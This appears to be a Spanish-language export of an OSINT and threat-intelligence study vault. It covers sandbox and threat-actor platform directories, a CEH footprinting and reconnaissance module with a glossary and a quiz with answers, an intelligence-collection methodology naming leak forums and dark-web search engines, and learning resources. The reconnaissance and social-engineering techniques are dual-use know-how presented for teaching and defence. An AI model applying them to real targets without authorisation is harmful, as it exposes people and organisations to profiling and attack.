Este indice es parte del primer nivel del cti-osint-cheatsheet Los cuatro submodulos cubren las dimensiones clave de targeting: que (operaciones), donde (paises), quien (victimas) y en que sector DarkTracer aparece como recurso recurrente en multiples submodulos Importado desde Inbox/Online Sandboxes.md durante consolidacion bulk. Directorio de plataformas de sandbox online para analisis dinamico de malware. Permite detonar muestras sospechosas en entornos aislados y obtener IOCs, comportamiento de red, modificaciones al sistema y clasificacion de amenazas.Sandboxes online: analisis dinamico de malware en entorno controlado. Analisis dinamico de archivos sospechosos detectados en alertas del SOC Extraccion de IOCs de red (C2, dominios, IPs) de muestras de malware Verificacion de payloads asociados a campañas de phishing Generacion de reportes tecnicos de comportamiento de malware ANY.RUN destaca por su interactividad, util para malware que requiere input del usuario VirusTotal es la herramienta mas versatil para busquedas rapidas de hashes/URLs/dominios
Forma parte de la estructura de threat-intelligence-feeds en el cheatsheet CTI-OSINT Importado desde Inbox/Operaciones y campañas conocidas.md durante consolidacion bulk. Directorio de 4 plataformas clave para investigar operaciones y campañas conocidas de threat actors. Incluye bases de datos de campañas documentadas, fichas de grupos y herramientas de seguimiento, con valoracion de utilidad.Seguimiento de operaciones y campañas: bases de datos, fichas de grupos, tracking. Investigar campañas historicas asociadas a un threat actor Identificar patrones de operacion entre multiples campañas Alimentar reportes de inteligencia estrategica con datos de campañas Correlacionar campañas con TTPs y herramientas empleadas MITRE ATT&CK es la referencia principal (rating 3/3) para campañas documentadas SOCRadar añade contexto geopolitico util para inteligencia estrategica
Forma parte de la estructura de threat-actor-search en el cheatsheet CTI-OSINT Importado desde Inbox/Paises Objetivo.md durante consolidacion bulk. Directorio de 4 plataformas para identificar los paises objetivo de threat actors. Permite mapear la distribucion geografica de ataques y correlacionar patrones de targeting regional.Targeting geografico: paises y regiones objetivo de threat actors. Identificar que threat actors operan contra un pais o region especifica Evaluar nivel de amenaza geografica para clientes en distintas jurisdicciones Alimentar inteligencia estrategica con datos de targeting regional Correlacionar paises objetivo con sectores afectados DarkTracer destaca como la plataforma mas util (rating 3/3) para targeting geografico
Forma parte de la estructura de threat-actor-search en el cheatsheet CTI-OSINT
Complementar con threat-actor-search para un perfil de targeting completo Importado desde Inbox/Ransomware Gangs.md durante consolidacion bulk. Importado desde Inbox/Sectores Objetivo.md durante consolidacion bulk. Directorio de 3 plataformas para identificar sectores industriales objetivo de threat actors. Permite mapear que industrias son atacadas por que grupos y con que frecuencia.Targeting sectorial: industrias y sectores objetivo de threat actors. Identificar que threat actors atacan un sector industrial especifico Evaluar nivel de amenaza sectorial para clientes en distintas industrias Alimentar inteligencia estrategica con datos de targeting por sector Priorizar threat actors relevantes segun sector del cliente DarkTracer destaca como la plataforma mas util (rating 3/3) para targeting sectorial
Forma parte de la estructura de threat-actor-search en el cheatsheet CTI-OSINT
Complementar con threat-actor-search para un perfil de targeting completo Importado desde Inbox/Tacticas, tecnicas y procedimientos(TTP).md durante consolidacion bulk. Directorio de 7 recursos para investigar TTPs (Tacticas, Tecnicas y Procedimientos) de threat actors basados en el framework MITRE ATT&CK. Incluye las matrices oficiales de ATT&CK, herramientas de busqueda avanzada y visualizaciones interactivas.Recursos TTP: frameworks, herramientas de busqueda y visualizacion MITRE ATT&CK. Mapear comportamiento observado en un incidente a tecnicas ATT&CK Identificar TTPs asociados a un threat actor especifico Diseñar hipotesis de threat hunting basadas en tecnicas ATT&CK Crear reglas de deteccion mapeadas a tecnicas especificas MITRE ATT&CK es el estandar de facto para catalogacion de TTPs Tidal Cyber ofrece una interfaz moderna con enrichment adicional Las visualizaciones interactivas son utiles para presentaciones y briefings
Forma parte de la estructura de threat-actor-search en el cheatsheet CTI-OSINT
tema-cti-fundamentos-doctrina
tema-ransomware-actores-y-respuesta ]]>projects/cti/threat-actor-search.htmlProjects/cti/threat-actor-search.mdTue, 28 Apr 2026 14:29:12 GMThttps://www.unifiedkillchain.com/ Combina con MITRE ATT&CK como mapping operativo
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-kill-chains-comparativa ]]>projects/cti/entidad-unified-kill-chain.htmlProjects/cti/entidad-unified-kill-chain.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/doctrina/ceh-00-start-here.htmlProjects/doctrina/ceh-00-start-here.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/doctrina/ceh-01-introduction.htmlProjects/doctrina/ceh-01-introduction.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master.
tema-cti-fundamentos-doctrina ]]>projects/doctrina/fundamentos-osint.htmlProjects/doctrina/fundamentos-osint.mdTue, 28 Apr 2026 14:29:12 GMThttps://archive.org") permite a los atacantes "recopilar información sobre una organización en las páginas web archivadas desde su creación." (Pt2, pág. 197). Herramientas como Photon pueden recuperar URLs archivadas. Extracción de Enlaces del Sitio Web: Análisis de enlaces internos y externos para descubrir información sobre aplicaciones, tecnologías y vulnerabilidades. Herramientas como Octoparse y CeWL (para generar listas de palabras). Extracción de Metadatos de Documentos Públicos: Obtención de metadatos de documentos como PDFs y documentos de Office para revelar información oculta (ej. nombres de usuario, direcciones de correo electrónico, fecha de creación). ExifTool es una herramienta útil para esto. Monitoreo de Páginas Web para Actualizaciones y Cambios: Herramientas como Website-Watcher detectan cambios en un sitio web, revelando posibles vulnerabilidades o nueva información. Búsqueda de Información de Contacto: Identificar nombres de contacto, números de teléfono, direcciones de correo electrónico, ubicaciones de la compañía, información de socios, noticias y datos de servicio. Búsqueda de Patrones de Publicación y Números de Revisión: Analizar la información de derechos de autor y números de revisión de páginas web puede revelar detalles sobre el desarrollo y la propiedad. Monitoreo del Tráfico del Sitio Web: Herramientas como Web-Stat, Rank Tracker y TeamViewer pueden recopilar datos sobre el tráfico del sitio web, páginas vistas, tasa de rebote y ubicación geográfica de los visitantes. El footprinting de correo electrónico implica "rastrear las comunicaciones de correo electrónico, cómo recopilar información de los encabezados de correo electrónico y las herramientas de rastreo de correo electrónico." (Pt2, pág. 207).Información obtenida de encabezados de correo electrónico: Servidor de correo del remitente, fecha y hora de recepción, sistema de autenticación, datos y hora de envío del mensaje, número único de mensaje, nombre completo del remitente, dirección IP del remitente. Ruta recorrida: El camino que el correo electrónico ha tomado a través de agentes de transferencia de correo. Tipo de dispositivo: El tipo de dispositivo utilizado (ej., escritorio, móvil, portátil). Geolocalización: Estimación de la ubicación de la IP del remitente. Herramientas de rastreo de correo electrónico: eMailTrackerPro, Infoga, Mailtrack y PoliteMail: Se utilizan para rastrear y extraer información de los encabezados de correo electrónico, así como para detectar la ubicación geográfica del remitente. La recopilación de información "Whois" es crucial para obtener datos sobre el propietario de un dominio, registrador, servidores de nombres y contacto.Información obtenida: Detalles del nombre de dominio, detalles de contacto del propietario, servidores de nombres de dominio, NetRange, cuándo se creó el dominio, registros de caducidad, registros actualizados por última vez. Tipos de registros Whois: Thick Whois: Almacena la información completa del Whois en los registradores para un conjunto particular de datos. Thin Whois: Almacena solo el nombre del servidor Whois del registrador de un dominio, que a su vez contiene los detalles completos de los datos que se están buscando. Registros de Internet Regionales (RIRs): Fuentes para datos Whois, incluyendo ARIN, AFRINIC, APNIC, RIPE NCC y LACNIC.Herramientas Whois:
Whois lookup services: Como whois.domaintools.com y www.tamos.com. SmartWhois, Batch IP Converter, Whois Analyzer Pro, y Active Whois: Herramientas para realizar búsquedas Whois en un dominio objetivo. El footprinting DNS implica "recopilar información sobre los servidores DNS, los registros DNS y los tipos de servidores utilizados por la organización objetivo." (Pt2, pág. 221). Ayuda a identificar hosts en la red objetivo y a explotar vulnerabilidades.Registros DNS y su descripción: A (Address): Apunta a una dirección IP de host. MX (Mail Exchange): Apunta al servidor de correo del dominio. NS (Name Server): Apunta al servidor de nombres del host. CNAME (Canonical Name): Alias canónico a un host. SOA (Start of Authority): Indica la autoridad de un dominio. SRV (Service): Registros de servicio. PTR (Pointer): Mapea una dirección IP a un nombre de host. RP (Responsible Person): Persona responsable. HINFO (Host Information): Información de host (CPU y OS). TXT (Text): Registros de texto sin estructurar. Herramientas de interrogación DNS: SecurityTrails: Una "herramienta avanzada de enumeración DNS capaz de crear un mapa DNS del dominio objetivo." (Pt2, pág. 223). DNSrecon y Reverse Lookup: Se utilizan para realizar búsquedas DNS inversas y descubrir rangos de IP asociados con un dominio. Esta fase se centra en la "ubicación del rango de red, el análisis de traceroute y las herramientas de traceroute." (Pt2, pág. 227).Localizar el rango de red: Asistencia en la creación de un mapa de la red objetivo. Identificación de rangos de IP y la subred utilizada. Uso de bases de datos Whois de ARIN para encontrar información de rango de IP. Traceroute: Programa que utiliza "el concepto de paquetes ICMP y el campo TTL en el encabezado de los paquetes ICMP para descubrir los routers en la ruta hacia un host objetivo." (Pt2, pág. 231). Ayuda a los atacantes a determinar la ruta de los paquetes de la red y a identificar los dispositivos intermedios. Herramientas como Path Analyzer Pro y VisualRoute proporcionan visualizaciones y análisis detallados de la ruta de red. La ingeniería social es el "arte de explotar el comportamiento humano para extraer información confidencial." (Pt2, pág. 238). Los atacantes se aprovechan de la naturaleza crédula y la disposición a proporcionar información.Información que los ingenieros sociales intentan recopilar: Detalles de tarjetas de crédito y números de seguridad social. Nombres de usuario y contraseñas. Productos de seguridad en uso. Sistemas operativos y versiones de software. Información sobre la disposición de la red. Direcciones IP y nombres de servidores. Técnicas de ingeniería social: Eavesdropping (Escucha): Interceptación no autorizada de comunicaciones. Shoulder Surfing: Observación secreta del objetivo para obtener información (ej., contraseñas, PINs). Dumpster Diving: Rebuscar en la basura para encontrar información valiosa (ej., facturas, notas adhesivas). Impersonation (Suplantación): Pretender ser una persona autorizada para obtener información. Las fuentes mencionan varias herramientas de propósito general para el footprinting: Maltego: Herramienta automatizada que "puede usarse para determinar las relaciones y los enlaces del mundo real entre personas, grupos de personas, organizaciones, sitios web, infraestructura de internet, documentos, etc." (Pt2, pág. 245). Recon-ng: "Marco de trabajo de reconocimiento web con módulos independientes para bases de datos que proporcionan un entorno donde se puede realizar un reconocimiento basado en web de código abierto." (Pt2, pág. 245). FOCA (Fingerprinting Organizations with Collected Archives): Utilizado para "encontrar metadatos e información oculta en los documentos." (Pt2, pág. 246). OSRFramewrok (OSINT Framework): Marco de trabajo de inteligencia de fuentes abiertas centrado en el "recopilación de información de herramientas gratuitas o de código abierto." (Pt2, pág. 248). Recon-Dog: "Herramienta todo en uno para todas las necesidades básicas de recopilación de información." (Pt2, pág. 249). BillCipher: "Herramienta de recopilación de información para un sitio web o dirección IP." (Pt2, pág. 250). Spyse: Recopila y analiza información sobre "dispositivos y sitios web disponibles en internet." (Pt2, pág. 251). Para defenderse contra el footprinting y las actividades de reconocimiento, las organizaciones pueden implementar las siguientes contramedidas: Restringir el acceso de los empleados a los sitios de redes sociales desde la red de la organización. Configurar servidores web para evitar la fuga de información. Educar a los empleados para que usen seudónimos en blogs, grupos y foros. No revelar información crítica en comunicados de prensa, informes anuales, catálogos de productos, etc. Limitar la cantidad de información publicada en un sitio web o en Internet. Usar técnicas de footprinting para descubrir y eliminar cualquier información sensible que sea de dominio público. Evitar que los motores de búsqueda almacenen en caché una página web y usar servicios de registro anónimo. Desarrollar e implementar políticas de seguridad para regular la información que los empleados pueden revelar a terceros. Separar los DNS internos y externos, y restringir las transferencias de zona a servidores autorizados. Deshabilitar los listados de directorios en los servidores web. Realizar capacitaciones de concientización sobre seguridad periódicamente para educar a los empleados sobre diversas técnicas y riesgos de ingeniería social. Optar por servicios de privacidad en una base de datos de Whois lookup. Evitar el vínculo cruzado de dominios para activos críticos. Cifrar y proteger con contraseña la información sensible. No habilitar protocolos que no sean necesarios. Usar siempre filtros TCP/IP e IPsec para la defensa en profundidad. Configurar Internet Information Services (IIS) para evitar la divulgación de información a través del banner de encabezado. Ocultar la dirección IP y la información relacionada implementando una VPN o manteniendo el servidor detrás de un proxy seguro. Solicitar a archive.org que elimine el historial del sitio web de su base de datos archivada. Mantener privado el perfil del nombre de dominio. Colocar documentos críticos como planes de negocio y documentos de propiedad fuera de la explotación. Capacitar a los empleados para frustrar las técnicas y ataques de ingeniería social. Sanear los detalles proporcionados a los registradores de Internet para ocultar los datos de contacto directos de la organización. Deshabilitar el geo-etiquetado de las cámaras para evitar el seguimiento de la geolocalización. Evitar revelar la ubicación o los planes de viaje en los sitios de redes sociales. Desactivar el acceso a la geolocalización en todos los dispositivos móviles cuando no sea necesario. Asegurarse de que no se muestre información crítica, como planes estratégicos, información de productos o proyecciones de ventas, en tablones de anuncios o paredes. Deshabilitar o eliminar las cuentas de los empleados que abandonan la organización. Configurar los servidores de correo para ignorar los correos electrónicos de personas anónimas. El footprinting y el reconocimiento son fases indispensables en el proceso de hacking ético. Al comprender cómo los atacantes recopilan información, las organizaciones pueden implementar contramedidas efectivas para proteger sus activos y mitigar los riesgos. Este módulo proporciona una base sólida para identificar las vulnerabilidades de la información y fortalecer la postura de seguridad.convert_to_textConvertir en fuente Footprinting (Toma de Huellas Digitales): El proceso de recopilar información sobre el entorno de seguridad de un objetivo antes de realizar un ataque. Se refiere a la recopilación de datos sobre la red, el sistema y la organización. Reconnaissance (Reconocimiento): La fase inicial en la que un atacante recopila la mayor cantidad de información posible sobre un objetivo para planificar un ataque. Es una etapa pasiva o activa de recopilación de inteligencia. Social Networking Sites (Sitios de Redes Sociales): Plataformas en línea donde las personas y organizaciones pueden crear perfiles y conectarse. Son una rica fuente de información personal y de negocio para los atacantes. Social Engineering (Ingeniería Social): El arte de manipular a las personas para que revelen información confidencial o realicen acciones que normalmente no harían, explotando sus debilidades psicológicas. BuzzSumo: Una herramienta avanzada de búsqueda de contenido social que identifica el contenido más compartido para un tema, autor o dominio específico en las redes sociales. Followerwonk: Una herramienta que permite a los atacantes explorar el gráfico social de Twitter, analizando los seguidores, las ubicaciones y los intereses de los usuarios para la toma de huellas digitales. Social Network Graphs (Gráficos de Redes Sociales): Representaciones visuales de conexiones y relaciones entre personas o grupos, utilizadas por los atacantes para analizar la estructura social y obtener información valiosa. Gephi: Una herramienta de visualización y exploración de datos para todo tipo de gráficos y redes. Utilizada por los atacantes para comprender las comunidades y organizaciones del mundo social-digital, y descubrir patrones ocultos. Sherlock: Una herramienta que se utiliza para buscar un gran número de sitios de redes sociales para un nombre de usuario objetivo, ayudando a los atacantes a encontrar perfiles asociados con un nombre de usuario dado. Social Searcher: Una herramienta que permite buscar contenido en redes sociales en tiempo real y proporciona análisis de datos profundos, útil para encontrar información sobre un objetivo. Website Footprinting (Toma de Huellas Digitales de Sitios Web): El monitoreo y análisis de la información de la organización objetivo disponible en sus sitios web, incluyendo la estructura del sitio, el software y las tecnologías utilizadas. Burp Suite: Una plataforma integral para realizar pruebas de seguridad en aplicaciones web, permitiendo a los atacantes interceptar solicitudes y respuestas HTTP, y analizar vulnerabilidades. Web Spiders (Rastreadores Web): Programas o scripts automatizados que navegan por la web y recopilan información de sitios web, como direcciones de correo electrónico de empleados o nombres. Web Data Extractor: Una herramienta automatizada que extrae información específica de sitios web, como datos de contacto, direcciones de correo electrónico y metadatos. Mirroring Entire Website (Reflejar un Sitio Web Completo): El proceso de crear una copia local o clon de un sitio web completo, lo que permite a los atacantes navegar y analizar el sitio sin conexión para identificar vulnerabilidades. HTTrack Web Site Copier: Una utilidad sin conexión que descarga un sitio web desde una dirección web a un directorio local, reconstruyendo recursivamente todos los directorios, HTML, imágenes, etc. Internet Archive's Wayback Machine: Una herramienta que permite a los usuarios visitar versiones archivadas de sitios web, lo que puede revelar información antigua que ya no está disponible en el sitio actual. ExifTool: Una herramienta multiplataforma de línea de comandos para leer, escribir y editar metadatos en varios formatos de archivo, incluyendo imágenes, audio y video. Website-Watcher: Una herramienta de monitoreo web que detecta cambios o actualizaciones en sitios web, y puede enviar notificaciones a los atacantes. Email Footprinting (Toma de Huellas Digitales de Correo Electrónico): La técnica de rastrear las comunicaciones de correo electrónico, recopilar información de los encabezados de correo electrónico y utilizar herramientas de rastreo de correo electrónico para obtener información del objetivo. Email Header (Encabezado de Correo Electrónico): Contiene metadatos detallados sobre el remitente, el destinatario, la ruta de enrutamiento y el software de correo electrónico utilizado, lo que es valioso para los atacantes. eMailTrackerPro: Una herramienta de seguimiento de correo electrónico que analiza los encabezados de correo electrónico y extrae información como la ubicación geográfica del remitente y la dirección IP. Infoga: Una herramienta de recopilación de información de correo electrónico que recopila datos de fuentes públicas como motores de búsqueda y servidores de correo electrónico para un correo electrónico dado. Whois Footprinting: La recopilación de información de red relacionada con un objetivo a través de la consulta de bases de datos Whois, que contienen información sobre el propietario del dominio, el registrador y los servidores de nombres. Regional Internet Registries (RIRs): Organizaciones que administran la asignación y el registro de números de recursos de Internet (direcciones IP, números de sistemas autónomos) dentro de una región geográfica específica. IP Geolocation Information (Información de Geolocalización IP): La capacidad de determinar la ubicación geográfica aproximada de un dispositivo conectado a Internet basándose en su dirección IP. DNS Footprinting (Toma de Huellas Digitales de DNS): La recopilación de información sobre los servidores de nombres de dominio (DNS) de un objetivo, sus registros DNS y los tipos de servidores utilizados, para mapear la infraestructura de red. DNS Interrogation Tools (Herramientas de Interrogación DNS): Herramientas utilizadas para extraer información de los servidores DNS, como registros A, MX, NS, SOA, y TXT, que revelan la estructura del dominio y subdominios. Reverse DNS Lookup (Búsqueda DNS Inversa): Un proceso para encontrar el nombre de dominio asociado con una dirección IP. Network Footprinting (Toma de Huellas Digitales de Red): La recopilación de información sobre la red de un objetivo, incluyendo el rango de red, la topología, los sistemas operativos y los dispositivos, para identificar los puntos de entrada para un ataque. Traceroute: Una utilidad de diagnóstico que registra la ruta (los routers intermedios) y mide los retrasos de tiempo de los paquetes a medida que viajan a través de una red IP. Path Analyzer Pro: Una herramienta que realiza un seguimiento de la ruta de la red, pruebas de rendimiento de DNS, Whois y resolución de red para investigar problemas de red. VisualRoute: Una herramienta de diagnóstico de red y trazado de ruta que identifica la ubicación geográfica de routers, servidores y otros dispositivos IP en la red de destino. Eavesdropping (Escucha a Escondidas): La interceptación no autorizada de comunicaciones o lecturas de mensajes, como audio, video o texto, sin el consentimiento de las partes que se comunican. Shoulder Surfing (Mirar por Encima del Hombro): Una técnica de ingeniería social en la que un atacante observa directamente a una persona para obtener información confidencial, como contraseñas o números de PIN. Dumpster Diving (Rebuscar en la Basura): El acto de buscar información en la basura de una persona u organización, como extractos bancarios, facturas o notas adhesivas, para obtener datos sensibles. Impersonation (Suplantación de Identidad): Una técnica de ingeniería social donde un atacante se hace pasar por una persona legítima o autorizada para engañar a los objetivos y obtener información confidencial. Maltego: Una herramienta automatizada utilizada para determinar relaciones y vínculos del mundo real entre personas, grupos, organizaciones, sitios web, infraestructura de Internet y documentos. Recon-ng: Un marco de reconocimiento web con módulos independientes para llevar a cabo el reconocimiento basado en la web de código abierto contra un objetivo. FOCA (Fingerprinting Organizations with Collected Archives): Una herramienta utilizada para encontrar metadatos e información oculta en documentos, como nombres de usuario, versiones de software y direcciones de correo electrónico. OSRFramework: Un marco de código abierto para la recopilación de inteligencia de fuentes abiertas que ayuda a realizar reconocimiento y análisis de datos en la web. Recon-Dog: Una herramienta de código abierto todo en uno para la recopilación de información básica del objetivo, utilizando APIs para obtener datos como direcciones IP, CMS detectado, honey pots y tecnologías. BillCipher: Una herramienta de código abierto que reúne información para un sitio web o una dirección IP, útil para recopilar información general sobre un objetivo. Spyse: Una plataforma que puede recopilar y analizar información sobre dispositivos y sitios web en Internet, incluyendo direcciones IP, SSL/TTL, vulnerabilidades y registros DNS. Responde cada pregunta en 2-3 oraciones. ¿Qué información busca un atacante de los perfiles de redes sociales de los usuarios y por qué? ¿Cómo puede un atacante obtener información sobre las estrategias de negocio de una organización a través de redes sociales? Menciona dos herramientas utilizadas para localizar información de sitios de redes sociales y describe brevemente su función. ¿Qué es el "rastreo web" (web spidering) en el contexto de la toma de huellas digitales de sitios web, y qué tipo de información busca un rastreador? Explica el propósito de "reflejar un sitio web completo" (mirroring entire website) como técnica de toma de huellas digitales. ¿Qué tipo de información se puede extraer de los encabezados de correo electrónico y por qué es útil para un atacante? Define "Whois Footprinting" y menciona al menos dos tipos de información que se pueden obtener de una consulta Whois. ¿Qué es la "toma de huellas digitales de DNS" (DNS footprinting) y por qué los atacantes la realizan? Describe el concepto de "tracert" o "traceroute" y su utilidad en la toma de huellas digitales de red. ¿Qué es la "ingeniería social" en el contexto de la toma de huellas digitales y cuáles son algunas de sus técnicas comunes? Un atacante busca información básica como nombre, datos de contacto (teléfono, correo electrónico), familiares, amigos, intereses y actividades. Esta información se utiliza para crear un perfil completo de la víctima y construir conexiones, lo que puede ayudar en ataques de ingeniería social. Las organizaciones pueden revelar sus estrategias de negocio a través de encuestas de usuarios y promociones de productos. Al analizar esta información disponible públicamente, un atacante puede deducir los planes y enfoques estratégicos de la organización. BuzzSumo es una herramienta de búsqueda de contenido avanzado que encuentra el contenido más compartido para un tema, autor o dominio, lo que puede revelar los intereses de la organización. Followerwonk es otra herramienta que ayuda a explorar y hacer crecer el gráfico social de Twitter, lo que permite a los atacantes comprender las conexiones y ubicaciones. El rastreo web es el uso de un programa automatizado (rastreador web o robot) para navegar por un sitio web y recopilar información. Los rastreadores buscan información como nombres de empleados, direcciones de correo electrónico, y pueden identificar la estructura del sitio y directorios para prevenir el rastreo. Reflejar un sitio web completo es el proceso de crear una réplica o clon de un sitio web. Esto permite a los atacantes navegar por el sitio sin alertar al objetivo, encontrar vulnerabilidades y obtener información oculta de los directorios o archivos de imagen y multimedia. Los encabezados de correo electrónico contienen detalles del remitente, información de enrutamiento, dirección, fecha, asunto y destinatario. Esta información es valiosa para los atacantes, ya que puede revelar datos del servidor de correo, direcciones IP y ubicación, lo que ayuda a lanzar ataques. Whois Footprinting es el proceso de recopilación de información relacionada con la red sobre una organización objetivo, incluyendo detalles del registro del dominio, nombre del servidor y contacto del propietario. La información obtenida puede ser el nombre de dominio, detalles del contacto del propietario, servidores de nombres de dominio, y rangos de red. La toma de huellas digitales de DNS implica recopilar información sobre los servidores DNS del objetivo, los registros DNS y los tipos de servidores utilizados por la organización. Los atacantes realizan esto para identificar los hosts conectados a la red del objetivo y explotar vulnerabilidades. Tracert (Windows) o Traceroute (Linux) es una utilidad de diagnóstico de red que rastrea la ruta que sigue un paquete IP desde un origen hasta un destino. Esto es útil para la toma de huellas digitales de red porque permite a los atacantes descubrir la topología de la red, los routers intermedios y las direcciones IP, lo que ayuda a mapear la infraestructura de la red. La ingeniería social es el arte de explotar las debilidades humanas para obtener información confidencial de forma inadvertida. Las técnicas comunes incluyen la escucha a escondidas, el "shoulder surfing" (mirar por encima del hombro), el "dumpster diving" (rebuscar en la basura) y la suplantación de identidad (impersonation). Compare y contraste las técnicas de toma de huellas digitales de redes sociales para individuos y organizaciones. ¿Cuáles son las diferencias clave en la información que se busca y cómo se utiliza esa información para diferentes propósitos maliciosos? Discuta la importancia de la toma de huellas digitales de sitios web en la fase de reconocimiento de un ataque. Incluya una explicación de al menos tres técnicas diferentes de toma de huellas digitales de sitios web (por ejemplo, examen del código fuente HTML, rastreo web, extracción de información de sitios web archivados) y el tipo de información que cada una puede revelar. Explique cómo la información obtenida de la toma de huellas digitales de correo electrónico, Whois y DNS puede combinarse para construir un perfil integral de un objetivo. Proporcione ejemplos de cómo cada tipo de información contribuye a la comprensión general del atacante. Analice el papel de las herramientas de software en la mejora de la eficiencia y el alcance de las actividades de toma de huellas digitales. Elija al menos tres herramientas mencionadas en el material (por ejemplo, BuzzSumo, Gephi, Sherlock, Burp Suite, ExifTool, eMailTrackerPro, SmartWhois, SecurityTrails, Path Analyzer Pro, Maltego, Recon-ng, OSRFramework) y describa cómo automatizan o facilitan la recopilación de información. Desarrolle una estrategia de contramedidas integral para una organización, basándose en las técnicas de toma de huellas digitales discutidas. Incluya medidas tanto técnicas como de concientización de los empleados para mitigar el riesgo de fuga de información y ataques de ingeniería social.
tema-curso-ceh-completo ]]>projects/doctrina/ceh-02-footprinting-recon.htmlProjects/doctrina/ceh-02-footprinting-recon.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Define question → What do I want to know? Identify sources → Table below | Collect → Manual + automations | Validate and document → Screenshots, hash, date, URL, archive.org |
Ver la entity dedicada con definicion canonica del ciclo OTAN/IC: ciclo-de-inteligencia.Las Necesidades Estratégicas de Inteligencia reflejan los requerimientos de información del decisor estratégico OTAN, orientadas a apoyar la toma de decisiones en un entorno de seguridad complejo y dinámico. No constituyen temas de análisis ni sustituyen a los PIR. NIR 1 – Anticipación de amenazas con impacto estratégico en el ámbito OTAN Necesidad de identificar de forma temprana riesgos emergentes que puedan afectar a la seguridad colectiva, la estabilidad regional o la cohesión de la Alianza. NIR 2 – Evaluación de la evolución y convergencia de amenazas multidimensionales Necesidad de comprender cómo interactúan y se refuerzan amenazas de naturaleza terrorista, híbrida, cibernética, tecnológica y geopolítica. NIR 3 – Detección de escenarios de escalada y puntos de inflexión estratégicos Necesidad de reconocer cambios cualitativos o cuantitativos que puedan derivar en crisis, escaladas de conflicto o presión estratégica sobre Estados OTAN. La Unidad empleará un enfoque operativo y práctico, combinando fuentes y métodos en función del objetivo analítico y del PIR correspondiente. La selección de fuentes responderá a su utilidad, fiabilidad y pertinencia operativa. Se explotarán, entre otras, las siguientes tipologías: Fuentes abiertas avanzadas (OSINT/SOCMINT): Plataformas cerradas y semi-cerradas, redes sociales, foros especializados, canales de mensajería, repositorios públicos y entornos de la dark web, para detección temprana de narrativas, actividad hostil y señales precursoras. Fuentes técnicas (CYBINT/SIGINT derivada): Observación de infraestructura digital, indicadores técnicos (IoCs), TTPs, malware y patrones de actividad, orientados a identificar campañas, capacidades y actores. Fuentes contextuales y analíticas: Producción académica, informes especializados, think tanks, observatorios regionales y datos estadísticos, utilizados para contextualizar y validar el análisis. Fuentes de apoyo geoespacial y visual (IMINT/GEOINT básica): Análisis de rutas, patrones territoriales y dinámicas logísticas cuando sea relevante para el PIR La verificación cruzada, la evaluación sistemática de fiabilidad y la trazabilidad de las fuentes serán obligatorias en todos los productos. Los productos de inteligencia se clasificarán conforme a los niveles de clasificación OTAN, en función de la sensibilidad de la información y del impacto potencial de su divulgación no autorizada: COSMIC TOP SECRET (CTS) NATO SECRET (NS) NATO CONFIDENTIAL (NC) NATO RESTRICTED (NR) Todos los documentos se registrarán de forma sistemática, identificados por PIR, tipo de producto y nivel de clasificación, garantizando un manejo y difusión coherentes con los estándares OTAN. Telegram Analytics / TgStat / Telemetr X (Twitter) Lists + Advanced Search + API v2 Reddit (Pushshift / Subreddits cerrados) Bellingcat-style social graphing (manual) Paste sites (Pastebin, Ghostbin, PrivateBin mirrors) Leak forums (BreachForums clones, Exploit, XSS) Onion search engines (Ahmia, TorBot, DarkSearch) RSS personalizados de actores y colectivos GitHub / GitLab OSINT *Media monitoring selectivo (prensa general y alternativa) VirusTotal (Graph + Retrohunt) MISP (communities europeas / ISACs) GreyNoise URLScan.io AbuseIPDB / Spamhaus Hybrid Analysis / Any.Run Malpedia AlienVault OTX RiskIQ / PassiveTotal (si disponible) ATT&CK Navigator (MITRE) ENISA Threat Landscape Europol IOCTA / SOCTA NATO CCDCOE publications CSIS / RAND Corporation Atlantic Council (DFRLab) **Mandiant blogs Academic journals (IEEE, ACM, Springer) World Bank / UNODC datasets National CERT advisories (EU/US) (rutas, patrones territoriales, logística) **Google Earth Pro (histórico) Sentinel Hub / Copernicus MarineTraffic / VesselFinder **FlightRadar24 (análisis histórico) OpenStreetMap + QGIS LiveUAmap ReliefWeb / ACLED UNHCR / IOM maps Social media geotagging (manual) Commercial imagery reports (secundarios)
tema-cti-fundamentos-doctrina ]]>projects/doctrina/metodologia-4-pasos-osint.htmlProjects/doctrina/metodologia-4-pasos-osint.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Ethical checklist ☐ Is the source 100% public? ☐ Is the data sensitive PII? → minimize ☐ Is there verifiable public interest? ☐ Can it be de-identified?
tema-cti-fundamentos-doctrina ]]>projects/doctrina/legal-considerations-osint.htmlProjects/doctrina/legal-considerations-osint.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. 1. Identification: What are we investigating? 2. Preservation: Archive EVERYTHING (archive.is, wayback) 3. Verification: Triangulate with 3+ sources 4. Contextualization: Complete chronology 5. Documentation: Screenshots + hash + timestamp 6. Validation: Peer review before publishing PHASE 1: DIRECTION ├── Define questions (RFI) ├── Establish legal limits └── Approve scope PHASE 2: COLLECTION ├── Passive sources ├── Semi-passive sources └── Save evidence PHASE 3: PROCESSING ├── Normalize data ├── Translate languages └── Structure information PHASE 4: ANALYSIS ├── Link analysis (Maltego) ├── Timeline creation ├── Pattern recognition └── Cross validation PHASE 5: DISSEMINATION ├── Executive report ├── Technical report ├── Visual presentation └── Evidence archive
tema-cti-fundamentos-doctrina ]]>projects/doctrina/professional-methodologies.htmlProjects/doctrina/professional-methodologies.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. 📺 YouTube Channels (Spanish): Ethical Hacking - Pablo González CyberSecurityJobs DragonJAR José Luis García Security Hacklabs 📚 Recommended Books: "Open Source Intelligence Techniques" - Michael Bazzell (8th ed., 2024) "OSINT for Threat Intelligence" - Scott J Roberts "The OSINT Handbook" - i-intelligence 🎓 Certifications: GOSI (GIAC Open Source Intelligence) - SANS CSCTP (Certified Social Media Intelligence Expert) - McAfee Institute OSINT Professional Certification - OSINT Combine 🔗 Communities: Reddit: r/OSINT, r/OpenSourceIntelligence Discord: IntelTechniques Server, OSINT-FR Telegram: OSINT Latam, OSINT Dojo
Twitter/X: #OSINT, #OSINTfor Good
